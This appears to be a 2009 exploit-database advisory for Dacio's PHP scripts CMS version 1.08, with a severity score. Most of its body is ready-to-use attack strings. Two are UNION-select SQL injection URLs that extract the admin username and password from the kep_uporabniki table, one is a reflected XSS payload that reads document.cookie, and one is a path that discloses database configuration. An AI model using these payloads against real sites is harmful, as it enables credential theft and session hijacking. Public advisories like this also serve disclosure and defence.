dacio's CMS 1.08 - Cross-Site Scripting / SQL Injection / File Disclosure

🗓️ 11 Feb 2009 00:00:00Reported by Mehmet InceType

Dacio's PHP scripts CMS v1.08 SQL Injection and XSS Vulnerabilitie

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
=                                 XORON 2009(C)
=
=               Dacio's PHP scripts CMS v1.08 Remote SQL Injection Vuln.      
=             
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
= Script:   Dacio's PHP scripts CMS, version 1.08
= Price:      $Free
=
= Author: xoron
=
= Tesekkurler unutmayan VolqaN!
=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
= BUGS   
=
=  Sql Injections:
=      /?Kat=-1/**/union/**/select/**/username/**/from/**/kep_uporabniki/**/where/**/IdUser=1/*
=      /?Kat=-1/**/union/**/select/**/userpass/**/from/**/kep_uporabniki/**/where/**/IdUser=1/*
=     
=
=  XSS Vuln:
=      /index.php?search_string="><script>alert(document.cookie)</script>
=
=  MySQL Tables:
=      /include/funkcije.inc
=                                      
=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

# milw0rm.com [2009-02-11]

11 Feb 2009 00:00Current

7.4High risk

Vulners AI Score7.4

dacio&#039;s CMS 1.08 - Cross-Site Scripting / SQL Injection / File Disclosure

dacio's CMS 1.08 - Cross-Site Scripting / SQL Injection / File Disclosure